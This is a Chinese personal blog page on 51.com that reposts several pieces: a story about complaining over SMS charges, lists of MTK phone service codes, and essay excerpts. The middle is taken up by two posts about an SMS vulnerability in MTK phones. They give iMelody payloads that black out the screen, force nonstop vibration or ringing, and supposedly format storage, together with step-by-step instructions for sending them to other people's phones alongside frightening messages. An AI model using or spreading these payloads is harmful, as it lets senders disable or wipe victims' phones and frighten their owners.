日记

  1. 最新日记

  2. 日记

    1. 日志
    2. 文章
    3. 转载
 

最新日记

科学家玩台球
2011-04-07 20:59

2011-02-24的日记
2011-02-24 02:47


* 2005-08-18,51.com这只可爱的小蝙蝠诞生啦!
* 2005-08-18,我注册了51主页,我终于在网上安家了~
* 2005-08-18,我认识了第1个51好友,到现在我已经拥有64个好朋友。
* 2005-08-18,迎来了第一个踩我51主页的人。
* 2005-08-18,我学会了上传照片,到现在我已经上传了274张照片。
                       
* 2005-08-18,我发表了第一篇日记:“
* 2005-08-18,我收到了第一个留言,到现在已经有7条留言和评论。
不知不觉中,51已经陪伴我走过1421个日日夜夜,在这里的每一段文字,每一张照片都凝聚着我青春最美好的记忆 。。。。   

51五周年之际,我写下的感想和对未来的美好祝福:
关于51.COM | 联系方式 | 帮助中心 | 安全须知 | 意见反馈 005-2010 © 51.com 或 13517077911@139.con 


我的好友(64位
  日记、随便说说(63篇
  上传的照片(274张
  网友给我的留言和评论(7条
  我收到的礼物(1份


 

一个遭遇短信扣费的手机用户投诉移动的过程

因最近较忙,又经常收到sp发的push短信。一气之下,故意进去点了他们的业务。一张图片2元,也真够黑的。好了,下面看看我怎样投诉。


客服小姐称‘m’.
我称‘j’


m!请问有什么可以帮你的吗?
j:请你帮我查一下我点过什么计次的梦网业务?
m:好的,请稍等。
m:你点播过……
j:那个服务商提供的?
m:是广州***(为了给这家公司保密,下面都以广州***代替)
j:好,小姐请你帮我做一下记录,我要投诉。 m
:先生,你要投诉什么呢?
j:我要投诉广州***,服务代号为xxx。该家公司私自下发违规短信。网址为xxxxx。还有该家公司没经过本人的同意就发短信给我,已经严重影响了我的日常生活。
m:好的,先生,我已经记录了你的投诉。48小时会有专人跟你联系。
j:好的,挂机!第二天移动的后台mm给我来电了。


下面才是重要的。


m,先生,关于你反映的问题我们经技术部门测试,你点播的业务是正常的。(给我来这一套,看我怎么对你)
j:没错,那业务的确是我点播的。但我要投诉的是这家公司违规群发信息,违反了《移动梦网sp合作管理办法》,以及这家公司没有经过本人的同意就发这种 <请文明用语>信息给我,给我的精神和日常生活造成了极其严重的不良影响。(没想到我那么会吹牛)
m:那你希望我们移动怎样处理呢? (这是移动mm对于新手的反问法,要慎重的答。)
j:我要求你们对sp的违规进行处罚,以及这家公司侵犯了我的合法权益,叫他们给我一份书面道歉信。
m:先生,对于这家sp如果真的出现违规的话,我们一定会进行处理的。(客服mm犹豫了一下 )说:先生你是否需要我们通知这家sp给你打电话呢?(这是他们串通好的,不过这正是我想要的)
j:好吧!叫他们给我解释一下。
m:好的,先生,如果有什么需要呢请你跟我们联系。 (当然要找你们,不找你们我找谁,呵呵!说一下笑)
j:好的,挂机!过了一个多小时,sp的客服mm给我来电,没想到这家公司办事效率如此之高,实在惊人。
s,先生,关于你反映的问题,我们公司并没有…………(尽说了些推托责任的话,这是他们常用的手法)
j:小姐,如果你要跟我说这些的,你就挂机吧!我会打电话给信产部,叫他们来处理的。
s:…………(又说了一大推的废话以及好听的话,不过这些对我没用)
j:小姐,我现在只想要求你们要不就给我道歉信(这个sp是拿不出来的)(尽说了些推托责任的话,这是他们常用的手法)
j:小姐,如果你要跟我说这些的,你就挂机吧!我会打电话给信产部,叫他们来处理的。
s:…………(又说了一大推的废话以及好听的话,不过这些对我没用)
j:小姐,我现在只想要求你们要不就给我道歉信(这个sp是拿不出来的),要不就给我赔偿。最后的要求呢就是我继续向上级投诉你们。 (sp的小姐想了一会儿)
s:那你想要多少的赔偿呢?
j:100倍的赔偿。
s:好的,我会向上级领导反映的。
j:快去吧!3小时之内给我电话,挂机。(呵呵,已经成功了99%)


不用等3小时,半小时sp的电话就来了。
s:你好,先生。关于……,我们最晚会在明天12点之前给你充值的。但请你…………(其实是他们暗示我不要跟移动提赔偿的事,呵呵,我也不傻)
j:好的,再见!
晚上7点多话费就到了。


下面总结一下:
1、因为sp私自群发信息,违反了《移动梦网sp合作管理办法》,你要根据这一点要求移动处罚sp.
2、因为sp所发短信没有经过你本人的同意,侵犯了个人的隐私权。你要利用这一点要求sp给你书面道歉信。 3、要在以上两点中猛攻。


手机*#66*#指令各项涵义
作者:he149760755    点击数:150    更新时间:2009-11-26
手机键入*#66*#指令后,会显示以下信息:各项显示含义如下:



1、Version 一般常用来指软件的“版本”


1-1 Version Info Summary版本信息总括
1-2 MCU SW 微程序控制器软件
1-3 Melody 曲调版本
1-4 Serial No. 序列号
1-5 BB Chip  基板芯片
1-6 DSP Code 数字信号处理器代码
1-7 DSP Patch 数字信号处理器修正版本号
1-8 MS Board  主板
1-9 Build No. 版本号


2、Headset 耳机测试(可开启、关闭)


3、Echo Loop 反射回路(可开启、关闭)


4、按键(不要随便乱调)


5、Vibrator振动装置


6、Loud SPK高声喇叭测试


7、Memory Card 存储卡


8、Receiver接受器


9、铃声


10、LED 发光二级管


10-1 Main LCM BL 主显示屏背光
10-2 Keypad LED 键盘灯
10-3 Status LED R  状态灯红色
10-4 Status LED G  状态灯绿色
10-5 Status LED B  状态灯蓝色


11、LCD液晶显示(看坏点)


12、LCD Contrast 液晶显示对照


13、ADC 模数转换, 模拟□数字转换器


13-1 VBAT电池电压
13-2 B Temp  电池温度
13-3 VAUX    辅助电压
13-4 Current n/a  充电电流


14、Charger充电器


15、Resource BIN 资源库


15-1 LANG-PACK(未理解出来)
15-2 CUSTPACK(未理解出来)


16、MTBF平均故障间隔时间


17、UART通用异步接收机


18、并行线测试 (两条线,看不懂)


19、NxM点测试


20、RTC 测试关机闹钟(事先调好闹钟)


用MTK方案的手机现在在市场上占有不小的比重,而且此漏洞几乎对所有MTK手机都有效,个人用户基本不能防止或者补救,所以受影响的范围非常广。经过测试,发现此漏洞真的屡试不爽。




MTK方案手机指的是采用台湾联发科公司研制的MTK手机芯片的手机,由于价格低功能强,市场占有率很高,同时由于生产成本低廉,很多不知名品牌都可以进入手机制造的行业,因此使市场造成不小的混乱。一般我们都称之为“山寨手机”,具体的一个显著特征是屏幕是触摸屏,而且屏幕下方有一条灰色功能区,上面分布有四五个功能按键,具体见图:








看了图基本上就清楚什么是所谓的“MTK手机”了,既然明确了目标,那么下面就开始讲讲这个漏洞。




一、被攻击时的状况:




最近经常有人反映自己的在接到一条恶作剧短信后,手机出现黑屏、振动不止、响铃等状况,这就是最典型的漏洞特征。这类短信基本上都是先告诉你往下翻阅短信会出现黑屏等状况,有勇气的就翻吧。一般人都会以为是无聊人的无聊游戏,谁知道当往下翻真会出现所说的状况……



  
二、漏洞代码:



其实出现上面这些情况都是由于MTK手机支持的一种imy格式铃声引起的,在短信内容中加载不同的imy文件会造成不同的效果。这种imy文件的内容具体如下:(注意,代码为两行#之间的部分,不包括#)




1。黑屏

###########################
BEGIN:IMELODY
BEAT:1200
MELODY:(ledoffbackoffvibeoffr5ledoffbackoffvibeoffr5@600)
END:IMELODY
###########################




2。猛震

###########################
BEGIN:IMELODY
VERSION:1.2
FORMAT:CLASS1.0
BEAT:100
MELODY:(ledoffledonbackoffbackonvibeon@300)
END:IMELODY
###########################




3。振铃

###########################
BEGIN:IMELODY
VERSION:1.2
FORMAT:CLASS1.0
BEAT:200
MELODY:(ledoffbackoffvibeonr5vibeoffledonbackonr5@200)
END:IMELODY
###########################




三、漏洞使用方法




这种短信漏洞的使用只能用于MTK手机上,也就是说必须是MTK手机编辑发送类似短信给其他的MTK手机,才能生效。所以首先,你必须有一部MTK手机才行。然后在电脑中打开记事本,把上面的相应的代码(两行#号之间的部分,不包含#号)粘贴进去,并存成后缀名为imy的文件,并且把imy文件放在手机的Audio文件夹内,一定注意是手机的文件夹,而非储存卡的。最后,开始在手机上编写短信(注意是短信,而非彩信),短信内容随意,编辑之后点“选项”——“插入对象”——“我的铃声”——选取刚才做好的imy文件,发送给同样是MTK手机的用户即可。


编写imy文件时请注意,在“MELODY”那一行中有一个@符号,后面是一个数字,其实这个数字是作用时间。@后面的数字越大时间也就越长,自己看情况更改即可。时间单位是毫秒。




四、漏洞分析


看了前面的内容,也就清楚其实这个漏洞的精髓就是imy文件。据了解,imy文件是索爱最早支持的一种代码形式的单音节铃声,可以用代码调用手机的解码芯片发出一些声音甚至一些核心指令。所以代码里面如果是诸如黑屏、响铃等类似的命令,发送给对方后,一旦打开也就触发了这些命令,当然会造成相应的结果。目前看来,只要有人能够懂得这些代码的编写语言,发送格式化储存卡一类的短信应该是没有问题的。我手里就有一个格式化命令的imy文件,由于担心给他人造成不良后果,一直没有实验。




五、实验情况及预防




在我的实验过程中,我发现并非所有屏幕有灰色功能键的手机都能中招,也许这些手机使用的不是MTK方案吧。我推测,既然imy并非MTK手机专有格式,那么理论上所有支持imy铃声的手机都会中招。至于预防,我想这是很难的,毕竟只要触发就会中招,也许只能是看到类似的短信立即关闭,不继续翻阅从而避免激活imy文件代码,可能会有一些帮助。当然,这只是相对的,如果对方发送的短信是先插入的imy文件再写文字的话……




再次声明,如果利用这个漏洞恶作剧一下也没什么,但是如果造成了相应损失,那么发送者就必须承担相应法律责任,请实验前一定慎重。而我在这里的文章只是在讨论漏洞本身,不涉及任何经济利益,因这个漏洞发生的任何损失与我无关。



山寨手机通用代码
2009-08-26 20:13

中文语言:*#0086# + send
查看版本:*#8375#
软件版本:*#8882#
测      试:*#87#
调      试:*#8899# (?)
默认语言:*#0000#+通话键
设置英文:*#0044#+通话键
繁体中文:*#0886#+通话键
简体中文:*#0086#+通话键
串号查询:*#06#
原厂设置:*#66*#
查看版本:*#8375#
工厂指令:*#3646633#
自动测试:*#87#
软件版本:*#8882#
*#035670766*001#
*#035670766*002#
有一些机器开机输入*#66*#不进测试的。可以在开机瞬间,在按键灯亮和开机音乐响的时候快速按*#*#............*#就可进入测试
仿苹果手机常用*#66*#  *#3646633#  *#66*# 
中文语言:*#0086# + send
查看版本:*#8375#                 
软件版本:*#8882#
测    试:*#87#
调    试:*#8899#
默认语言:*#0000#+通话键
设置英文:*#0044#+通话键
繁体中文:*#0886#+通话键
简体中文:*#0086#+通话键
串号查询:*#06#
原厂设置:*#66*#
查看版本:*#8375#
工厂指令:*#3646633#
自动测试:*#87#
软件版本:*#8882#
*#035670766*001#
*#035670766*002#

让 MTK手机 黑屏死机 的短信代码 让山寨机死机的短信 让手机死机的短信
可以自己动手做一下,很简单我试过了!呵呵呵....
#########################
黑屏代码:
###########################
BEGIN:IMELODY
BEAT:1200
MELODY:(ledoffbackoffvibeoffr5ledoffbackoffvibeoffr5@600)
END:IMELODY
###########################
猛震代码:
###########################
BEGIN:IMELODY
VERSION:1.2
FORMAT:CLASS1.0
BEAT:100
MELODY:(ledoffledonbackoffbackonvibeon@0)
END:IMELODY
###########################
格式化代码
###################
BEGIN:IMELODY
VERSION:1.2
FORMAT:CLASS1.0
COMPOSER:MTK(23)Fomat
BEAT:180
MELODY:backoffbackofffbackoffbackoffbackoffbackoffbackoffbackoffbackoff
(+"@9999999999999999999999999">"+<melody>+"@9999999999999999999999999)"
##############

“@”后面的数字越大,重复次数越多
在电脑上,打开记事本,输入两行#之间的内容,另存为*.imy文件即可!
imy 放到手机里的Audio文件夹,切记手机里的Audio文件夹!! 然后点击写短信(不是彩信)
选项: 插入对象我的铃声选取刚才那个IMY文件发送



振铃
BEGIN:IMELODY
VERSION:1.2
FORMAT:CLASS1.0
BEAT:200
MELODY:(ledoffbackoffvibeonr5vibeoffledonbackonr5@200)
END:IMELODY

手机一定要调成静音选者U盘模式,这里一个是手机存储和外接存储卡,这里一定要进自带的手机存储
进入AUDIO,然后新建文本复制上面的一种代码扩展名改成imy(文件名随便)
开关LED(ledoff ledon) 开关背景灯(backoff backon) 开震动(vibeon) 重复无限(@0)
BEAT是速度 可以任意修改 MELODY 后面的就是具体语句了 大家可以自定义语句
然后随便编辑一条短信不是彩信 比如说手机被黑客控制了等等恐怖语句 然后点选项 再点插入对象 我的铃声 选者我刚弄的IMY文件 然后输入

手机号码
振铃可以按别的建回复状态
黑屏 按任意键屏会短暂亮起然后全黑 只能取下电池
狂震 只能取下电池

自然----代序
  有人间我,为何要住进大屿山去。

  想了想,一个十多年前的经验倒流回我的脑海里,那是午后一个安详的时刻,我往大屿山的大澳度周末,放下轻便的行李后,在附近的田野随意漫步。

  最后在溪旁一块大石上坐了下来。

  望进水里,水清见底,却看不到甚么东西,连小鱼也没有一条。

  我还不为意,以为溪中情景应属如是。

  但当我坐了一段时间后,奇妙的事发生了。

  小鱼开始从石隙问游出来,原本石头般停在溪底的贝类小生物,开始它们缓慢却肯定的移动,小虾小蟹也闪闪缩缩、步步为营地从隐藏处出来露面。

  水里充满了生机和动态,与先前溪内的情景便像两个世界。
......

糖衣

  世界上大多数具有悠久历史的宗教,她们中心的精粹,都具有玄之又玄的永恒意义,代表了有限的生命,追求无限存在的“困兽之斗”。

  佛教如是、道家、天主教、回教亦莫不如是。

  可是为了适合大众的需求,一个宗教为了顺应大势,却无法不披上可日的糖衣。

  以佛教为例,释迦正是个反传统的改革者,将求之于神的“外求”,收归于“觉己”的悟求,但发展下去,却无法不将印度其他宗教如印度教的经诵、符咒、求神作福收人教内,使信者能“直接”从宗教中获益,佛陀纯粹形而上的哲学和精神历程,变成繁琐不堪,求神拜怫的仪式。正如天主教的天堂地狱,使习惯了赏与罚的世人得其所哉,信者有利,不信者无利,简明易行。
......

共10篇日记